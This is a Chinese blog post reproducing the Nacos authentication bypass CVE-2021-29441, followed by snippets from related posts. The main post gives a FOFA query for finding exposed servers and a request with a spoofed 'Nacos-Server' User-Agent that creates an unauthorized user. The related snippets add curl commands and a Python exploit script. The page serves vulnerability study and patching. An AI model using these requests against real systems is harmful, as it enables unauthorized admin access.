Nacos 身份验证绕过漏洞（CVE-2021-29441）

bmaoHk

已于 2024-10-05 00:33:11 修改

阅读量970

点赞数 8

分类专栏：渗透测试文章标签： web安全网络安全安全系统安全

于 2024-10-05 00:06:36 首次发布

本文链接：https://blog.youkuaiyun.com/bmaoHk/article/details/142708441

版权

渗透测试专栏收录该内容

3 篇文章

订阅专栏

一、描述

nacos是阿里巴巴的一个开源项目，旨在帮助构建云原生应用程序和微服务平台，在早期低版本的Nacos中，当配置文件使用身份验证（Dnacos.core.auth.enabled=true）时候，会判断请求ua是否为"Nacos-Server"，如果是的话则不进行任何认证

二、资产测绘

fofa:title=“nacos”
在这里插入图片描述

三、影响版本

Nacos <= 2.0.0-ALPHA.1

四、漏洞复现

1、访问/nacos/v1/auth/users?pageNo=1&pageSize=9验证漏洞是否存在
1、将UA改为：Nacos-Server
2、POST方法提交
3、POST /nacos/v1/auth/users?username=test&password=test HTTP/1.1

1、访问/nacos/v1/auth/users?pageNo=1&pageSize=9验证漏洞是否存在
在这里插入图片描述

在这里插入图片描述
2、创建用户

使用账号登录系统

五、修复建议

升级到最新版nacos

正在学习网络安全的小伙伴，有需要安全资料或者CISP资料的可以关注安全技术达人公众号，后期回不断分享安全知识，回复“学习资料”可领取网络安全书籍。

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

bmaoHk

关注关注

8
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

nacos权限绕过漏洞(nacos认证绕过安全漏洞)

计算机毕业论文源码，学生个人网页制作html源码。贴近用户做网络推广和互联网优化。

11-02

3802

可以看出在 1.2~1.4.0 的版本期间是存在认证绕过安全漏洞的，是因为 User-Agent 中包含了 Nacos-Server 使得认定请求来自于其他服务端，从而绕过了认证。nacos权限绕过漏洞环境搭建我们选择版本nacos 1.4.0来对漏洞进行复现下载安装包后运行startup.cmd -m standalone 需要在环境变量中设置 JAVA_HOME ，设置完环境变量后重新打开一个命令行否则并不生效，启动的时候最好用管理员权限启动，否则会出现启动不成功的问题

Nacos 身份认证绕过漏洞(QVD-2023-6271)

feelxing的专栏

03-31

6003

Nacos 身份认证绕过漏洞(QVD-2023-6271)，nacos版本从1.4.1升级到2.2.1最新版本

参与评论您还未登录，请先登录后发表或查看评论

漏洞预警：Nacos权限绕过漏洞复现(CVE-2021-29441)

yuanlirong22的专栏

02-19

1332

漏洞预警：Nacos权限绕过漏洞复现(CVE-2021-29441)

漏洞挖掘--nacos漏洞汇总

热门推荐

qq_50854662的博客

03-20

1万+

漏洞原理为开源服务管理平台 Nacos在默认配置下未对 token.secret.key 进行修改，导致远程攻击者可以绕过密钥认证进入后台造成系统受控等后果。

nacos身份认证绕过漏洞

bmaoHk的博客

10-04

1440

nacos是阿里巴巴的一个开源项目，旨在帮助构建云原生应用程序和微服务平台，nacos在默认情况下未对token.secret.key进行修改，导致攻击者可以绕过密钥认证进入后台。也就是nacos的密钥是有默认值的，其鉴权是JWT,我们知道密钥即可伪造一个恶意的JWT令牌来攻击对于jwt加密其实就是用了base64 密钥是写死在源码里面的所以直接可以用jwt伪造攻击对应就是数据包的accesstoken。正在学习网络安全的小伙伴，有需要安全资料或者CISP资料的可以关注。”可领取网络安全书籍。

【备忘录】修复docker环境下的nacos安全漏洞：身份认证绕过漏洞

Xcong_Zhu的博客

10-23

2640

在nacos2.2.0.1和1.4.5版本之前的版本中，可能是为了便于开发环境使用，默认开启了一个自带的token默认值，导致上述报告中，可以利用默认的访问秘钥跳过认证，直接登陆。1、检查application.properties文件中token.secret.key属性，若为默认值，可参考：https://nacos.io/zh-cn/docs/v2/guide/user/auth.html进行更改。之后讲登录返回包修改为正确登录信息。点击发送发现正确登录返回信息。同时选中base64加密。

【认证绕过】NACOS身份认证绕过漏洞分析

m0_61572518的博客

04-12

6902

工作中遇到一个nacos服务认证绕过的问题，在此总结一下漏洞原因。

Nacos 认证绕过漏洞（CVE-2021-29441）

gaomei2009的专栏

06-20

753

Nacos 是阿里巴巴推出来的一个新开源项目，是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集，可以快速实现动态服务发现、服务配置、服务元数据及流量管理。该漏洞发生在nacos在进行认证授权操作时，会判断请求的user-agent是否为”Nacos-Server”，如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。

Nacos认证绕过漏洞（CVE-2021-29441）

tpaer的博客

12-16

2183

复现Nacos认证绕过漏洞，导致未授权的任意访问。

【Nacos漏洞修复】Nacos未授权访问漏洞(CVE-2021-29441)

m0_52985087的博客

03-20

1万+

但是由于配置的过于简单，并且将协商好的user-agent设置为Nacos-Server，直接硬编码在了代码里，导致了漏洞的出现。命令：curl -X GET 'http://localhost:8848/nacos/v1/auth/users?命令：curl -X GET 'http://localhost:8848/nacos/v1/auth/users?命令：curl -X GET 'http://localhost:8848/nacos/v1/console/server/state'

NACOS身份认证绕过漏洞批量检测poc.7z

02-24

NACOS身份认证绕过漏洞批量检测poc.7z

Nacos 存在认证绕过漏洞（CVE-2021-29441）

北方的孤夜

06-04

2278

Nacos 存在认证绕过漏洞（CVE-2021-29441）

Nacos身份绕过漏洞（QVD-2023-6271）复现学习

cc123489ll的博客

06-06

1130

本文仅做复现，不做分析！其实就是默认keyshiro550exchange的jwt伪造等，都是类似的问题。Nacos是一个易于使用的平台，专为动态服务发现和配置以及服务管理而设计。可以帮助您轻松构建云原生应用程序和微服务平台。目前Nacos身份认证绕过漏洞()，开源服务管理平台Nacos在默认配置下未对进行修改，导致远程攻击者可以绕过密钥认证进入后台，造成系统受控等后果。基本上都受到了影响，最新的版本已修复漏洞。

NACOS身份认证绕过漏洞

总有人间一两风，填我十万八千梦

02-24

1万+

目录漏洞描述影响版本 docker-compose文件一键搭建漏洞环境漏洞复现修复建议漏洞挖掘自动化探测脚本POC nacos：Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集，帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。漏洞描述 2020年12月29日，Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞。通过该漏洞,攻击者可.

Nacos身份认证权限绕过+漏洞利用工具分享

hackzkaq的博客

12-27

3070

JSON Web Token (JWT)是一个开放标准(RFC 7519)，它定义了一种紧凑的、自包含的方式，用于作为JSON对象在各方之间安全地传输信息。该信息可以被验证和信任，因为它是数字签名的。在线解密查看内容：

（附nuclei yaml文件）Nacos 身份认证绕过漏洞(CVE-2021-43116)漏洞复现

nglj9527的博客

05-20

1923

Nасоѕ是一个专为动态服务发现和配置以及服务管理而设计的平台。在 Nасоѕ 1.4.1 之前的版本中，当配置为使用身份验证（-Dnасоѕ.соrе.аuth.еnаblеd=truе）时，Nасоѕ 使用 AuthFilｔеr ѕеrvｌеt 过滤器强制执行身份验证。该过滤器有一个后门，使 Nасоѕ 服务器能够绕过该过滤器，从而跳过身份验证检查。此机制依赖于用户代理 HTTP 标头，因此很容易被欺骗。此漏洞可能允许任何用户在 Nасоѕ 服务器上执行任何管理任务。。

vulhub CVE-2021-29441

01-17

### 关于CVE-2021-29441漏洞详情针对阿里巴巴Nacos存在的权限认证绕过漏洞(CVE-2021-29441)，当接收到HTTP请求时，如果`User-Agent`头被设置为"Nacos-Server"，服务器将不会对该请求做进一步的身份验证。这种行为原本是为了方便服务间通信而设计，但由于实现过于简化且直接在源代码中硬编码了此条件，使得任何能够控制HTTP头部的客户端都可以轻易模拟这一特定值并规避身份验证机制[^3]。受影响版本包括但不限于官方发布的某些指定版次，在这些版本中的安全策略存在缺陷，允许未经许可的操作被执行，比如读取管理员账户信息、创建新用户以及移除现有账号等高危动作。 ### 利用方法概述为了重现或研究该漏洞的影响范围及其具体表现形式，可以通过如下步骤来构建实验环境： #### 准备工作确保已安装Docker及docker-compose工具，并拉取vulhub项目仓库至本地文件系统内。 ```bash git clone https://github.com/vulhub/vulhub.git cd vulhub/nacos/CVE-2021-29441/ ``` 启动含有易受攻击组件的服务实例： ```bash docker-compose up -d ``` 此时应该有一个运行着有缺陷版本Nacos集群管理平台的容器正在监听网络连接请求。 #### 实施测试构造恶意HTTP GET/POST请求向目标地址发送带有特制`User-Agent:Nacos-Server`字段的消息体；这可通过多种编程语言完成，下面给出Python脚本作为例子之一： ```python import requests url = "http://localhost:8848/nacos/v1/auth/users/login" headers = { 'User-Agent': 'Nacos-Server' } response = requests.get(url, headers=headers) print(response.text) ``` 上述代码片段尝试访问默认路径下的登录接口，预期结果是在无需提供合法凭证的情况下成功返回响应数据，证明确实能绕过正常的安全检查流程。